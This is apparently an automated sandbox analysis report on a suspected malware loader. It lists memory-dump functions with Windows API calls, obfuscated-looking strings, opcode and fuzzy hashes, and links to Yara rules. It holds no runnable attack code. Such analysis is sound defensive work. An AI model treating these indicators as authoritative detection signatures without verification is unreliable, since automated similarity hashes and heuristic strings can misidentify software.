EnumSystemLocalesW.KERNEL32(001AC56B,00000001,?,?,?,001ACDD6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AC649

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: cb33a0bcad750bba7bcc095cf51beb39a9c4e4e9125ef41f7c996c43bb8327d7
Instruction ID: 6435b29b8561be1134b397fc13bb2a49f6d56b0d89d73db63eda71c10833e244
Opcode Fuzzy Hash: cb33a0bcad750bba7bcc095cf51beb39a9c4e4e9125ef41f7c996c43bb8327d7
Instruction Fuzzy Hash: 1AF0A03A70020557CB04AF35DC4576A7FA5EF82B14B0A4059EA098B691C7719942C790

Function 001A3810 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001A2209,?,20001004,00000000,00000002,?,?,001A180B), ref: 001A3844

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: bbe27a708e376bc6dce23885bc738100ca1ae388a758a6ef299bdd7b41786f88
Instruction ID: 0bd2178ebaab9b1a1235f222ef25ffc367bcead655868c9e25d644ffcda72e55
Opcode Fuzzy Hash: bbe27a708e376bc6dce23885bc738100ca1ae388a758a6ef299bdd7b41786f88
Instruction Fuzzy Hash: C7E04F3A500118BBCF122F60DC04B9E7E2AEF55761F004120FD2665221CB758F61AAD5

Function 00204E00 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

/.-,, xrefs: 00204E25

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: /.-,
API String ID: 0-4180950418
Opcode ID: e0f9e11d950cb37439ae44eec80e902b558a79d1b5258e11c1d8b142b8ac354a
Instruction ID: dd1547553e5153afbf59257ea628d066a1642dd576ba0c4ad2a4c25b56b1e12a
Opcode Fuzzy Hash: e0f9e11d950cb37439ae44eec80e902b558a79d1b5258e11c1d8b142b8ac354a
Instruction Fuzzy Hash: D891A2716183228BC725DF18D48052FB7E2BF99750F15C92CEA95973A6DB31DC60CB81

Function 00204B30 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

/.-,, xrefs: 00204B65

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: /.-,
API String ID: 0-4180950418
Opcode ID: 9591eb5e6f014507b6f77b7a37df3fb3db69a202356dd150857bd90b711e29c7
Instruction ID: 73b837c6ea3f0e1f448c46277c4022797a415e02a546a617780ec385e574397b
Opcode Fuzzy Hash: 9591eb5e6f014507b6f77b7a37df3fb3db69a202356dd150857bd90b711e29c7
Instruction Fuzzy Hash: F181A0746143029BD715EF18C890A2AB7E2FFD9750F15C92CE6858B3A6EB31ED21CB41

Function 001C84A0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 001C85D6

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 87d5ed803c5b733315ab01095841bef12b7b20767e0dc7307d38f9d7e17edac2
Instruction ID: d50bb0ef23ddf7e9cf513098bcd10d62dcd700d887b7c21fa258bf6151d0ab23
Opcode Fuzzy Hash: 87d5ed803c5b733315ab01095841bef12b7b20767e0dc7307d38f9d7e17edac2
Instruction Fuzzy Hash: 85B127711093819FD325CF18C880A5BFBE0AFA9704F484A2DE5D997782D771E918CBA6

Function 001D4882 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

\fs>, xrefs: 001D4BB9

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: \fs>
API String ID: 0-699854602
Opcode ID: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
Instruction ID: 27e7e31bf9de665bcdd8c7fa69003eba16e13d802475675d954927465126f96d
Opcode Fuzzy Hash: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
Instruction Fuzzy Hash: 8CB1F576519B808FC3268B38C4953E7BFE5AB66314F588D6EC4EF87386D638A604C711

Function 00197695 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000076A1,00196991), ref: 0019769A

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bc35162432fef40433e6e0db73a27ebfd67fa2fa035d952996b0a2d06aa169f3
Instruction ID: e7cc53efce2858d913812091a8b68980e7a3c5ae6720bd47fa2b23e4bf360b76
Opcode Fuzzy Hash: bc35162432fef40433e6e0db73a27ebfd67fa2fa035d952996b0a2d06aa169f3
Instruction Fuzzy Hash:

Function 001CCC40 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

EONQ, xrefs: 001CCD30

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: EONQ
API String ID: 0-2229190151
Opcode ID: bfb22d384f13b7f54fd5d87b2983e82eb7c3fadec93facaf8624bbd5ac152fb2
Instruction ID: 64d5c5dfdb59e3b65faec7c7e82f7c645b057bbd944584cc4be3ec594d557df4
Opcode Fuzzy Hash: bfb22d384f13b7f54fd5d87b2983e82eb7c3fadec93facaf8624bbd5ac152fb2
Instruction Fuzzy Hash: 37510832F412584BDB54CE78CCD23DEA7E29B99320F1945B9C88DE7341D9788D968B88

Function 00191F1A Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Z81xbyuAua, xrefs: 0019203C

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: Z81xbyuAua
API String ID: 0-3121583705
Opcode ID: ec99b9cc9169b3739fff7067996ac92d1708fd9168cb128a1770fc66bdb4b951
Instruction ID: 05f0ba6268d540716cbc03bab4ac843c4089d7c81af3a7df2907d9ebab28558e
Opcode Fuzzy Hash: ec99b9cc9169b3739fff7067996ac92d1708fd9168cb128a1770fc66bdb4b951
Instruction Fuzzy Hash: 54411C76E2062B5BDF0CEEB8C8560AFBB65EB56310B044279ED11DB3D1E3348A45CAD0

Function 001DCE13 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

%*+(, xrefs: 001DCE45

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: 7e992bcb0419394c7b56ce8b9b6dc6be5684b2f0c769e16de6df5883eacfe6c2
Instruction ID: 581284c9781403d4cc2c1ae5aae029c2bcd6e1bdbb9e6b9d46b433673a705b40
Opcode Fuzzy Hash: 7e992bcb0419394c7b56ce8b9b6dc6be5684b2f0c769e16de6df5883eacfe6c2
Instruction Fuzzy Hash: AD4102705183029BDB1C8F18949067FB7B2FF86B51F205E1DE0825B296D731DA02CBC9

Function 001CAD60 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

SPQV, xrefs: 001CAE7E

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: SPQV
API String ID: 0-3051931956
Opcode ID: 573b9eb2576cc5e10adbf4a37c6f1793a70a231155131bc283978463e67e9f7b
Instruction ID: df63e545a47715d3ca2512bf8f6f0d10710b3c809383f16ea3677c769c480755
Opcode Fuzzy Hash: 573b9eb2576cc5e10adbf4a37c6f1793a70a231155131bc283978463e67e9f7b
Instruction Fuzzy Hash: 9731CB205083508BE7016B78945A7ABBFE1EFA2328F149D6CE9C1D72D2DB78C8468757

Function 001D2FC0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

+, xrefs: 001D30FD

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: a794292c5b2f766263ce056902814cd33f0a334f0ed32c26101f63c381c01e53
Instruction ID: cd474249f81f048fed3b30be75adb9c3bd61160e910edcf86a85fcb528a8e4c2
Opcode Fuzzy Hash: a794292c5b2f766263ce056902814cd33f0a334f0ed32c26101f63c381c01e53
Instruction Fuzzy Hash: 48412775209B418FD328CF38C5D9767BBE2BB49304F18886DD5AB87385D779A904CB41

Function 001CE672 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

47, xrefs: 001CE6C2

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: 47
API String ID: 0-1112425479
Opcode ID: 08839e348e23fcb360676f012b37867764b0dd2162ddaa416d4c4b5948d1cdf3
Instruction ID: eb8b78de9db2b04d7e8659a2082e762ae842b2e816b206beeeb0b454401c1e65
Opcode Fuzzy Hash: 08839e348e23fcb360676f012b37867764b0dd2162ddaa416d4c4b5948d1cdf3
Instruction Fuzzy Hash: 5B219D750093018AD304CF21C951B6BBBF2EFE2319F14A91DF0D64B661E778C909CB8A

Function 002018B5 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

;:=<, xrefs: 00201917

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: ;:=<
API String ID: 0-1779823811
Opcode ID: 87d10e265b9409441902dcb20c09a73f5c0b134dd14e95eeb65f61383757cde8
Instruction ID: 1707e4f41535c5166baa0aab75727c7103b51ada33e30fbf4694907e67629e11
Opcode Fuzzy Hash: 87d10e265b9409441902dcb20c09a73f5c0b134dd14e95eeb65f61383757cde8
Instruction Fuzzy Hash: 2721C331B103199FDB188F58C8926E973B1EB86305F151424E542E7393D638DD229B51

Function 001EAB28 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

%*+(, xrefs: 001EAB45

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: fc8af48a4930ed1354326aebcf23a7e696fd3f78917aa8bb71f4a1efd1b347df
Instruction ID: 5ee2a9c7b5396d05570a4de3ccec8ec2bc0ef74f94ee71d13d334ac3622f10cc
Opcode Fuzzy Hash: fc8af48a4930ed1354326aebcf23a7e696fd3f78917aa8bb71f4a1efd1b347df
Instruction Fuzzy Hash: D321F43060D7419BDB2D8F25A5D173FB7B2BB85B41F24152CE09213197E732EA068B96

Function 002017E4 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

;:=<, xrefs: 00201843

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: ;:=<
API String ID: 0-1779823811
Opcode ID: 459832366922f5352c287ef8b3f707be57a2ffb6f6291cd65d3ed09dc2ce6e1c
Instruction ID: d0ba45ce93eb6b79c2cae151f563ae1847ed47f03a803de5d1969915a407a972
Opcode Fuzzy Hash: 459832366922f5352c287ef8b3f707be57a2ffb6f6291cd65d3ed09dc2ce6e1c
Instruction Fuzzy Hash: 45110231F502069BEB148E59C8827FAB7B6EB82355F249538E041E73D3D238DA229B51

Function 001E8070 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

%*+(, xrefs: 001E80CD

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: d2be353f21452b46cf2fa4bdea417af779c18f4e84e7baeb36dbe17b1f20780a
Instruction ID: b4464b035df13ce84b5cfdb18fc99c7b102456e5535ec65c194d544011bf707c
Opcode Fuzzy Hash: d2be353f21452b46cf2fa4bdea417af779c18f4e84e7baeb36dbe17b1f20780a
Instruction Fuzzy Hash: D3118C36955350CBD3288F10C48062FB3A2FFC5B61F69652CE88527255CB34DD01CBC6

Function 001E8E5D Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

%*+(, xrefs: 001E8EF5

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: 8594d87570d08c7f80b6264a92223d3b87bd8b212fe51fc5d293e9f2df4064ea
Instruction ID: 81782628ca0e4e0bea7d8b7c3b4e19adef2ae0154e4ed2006503eb87c12449d0
Opcode Fuzzy Hash: 8594d87570d08c7f80b6264a92223d3b87bd8b212fe51fc5d293e9f2df4064ea
Instruction Fuzzy Hash: 4601F5B15183409BD7288F1998D553FB7B6EB82755F10182CE18247197E737CD41CB06

Function 001EBF45 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

%*+(, xrefs: 001EBF75

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: 483e03400d94eeb17c5c23020ce485a34597f9437a6d1ba4daa91211f802e4f8
Instruction ID: a82df3ab580d88bec57b81db91d8cc768efabd825e7201fc4c743fda9b55b0b7
Opcode Fuzzy Hash: 483e03400d94eeb17c5c23020ce485a34597f9437a6d1ba4daa91211f802e4f8
Instruction Fuzzy Hash: E9018734619381DBD7188F11D8D093FB3B2EF9A745F10A828E8851B26AD331DC418B1A

Function 001EC9F2 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

%*+(, xrefs: 001ECA15

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: 5dbb7a5966b569f7a7c1c5984c42d66dd267201f676ec5e2f740299be00d2db5
Instruction ID: 48be9f0f6d68a465c68cfe11b6313231a4760f10776d4ae881255f11e5185985
Opcode Fuzzy Hash: 5dbb7a5966b569f7a7c1c5984c42d66dd267201f676ec5e2f740299be00d2db5
Instruction Fuzzy Hash: 1A01BC34508781DFCB18CF15988093EB3A1BB9A741F10A93CE4A257656E731D9078BD9

Function 001CE7A8 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

[vSO, xrefs: 001CE7AE

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

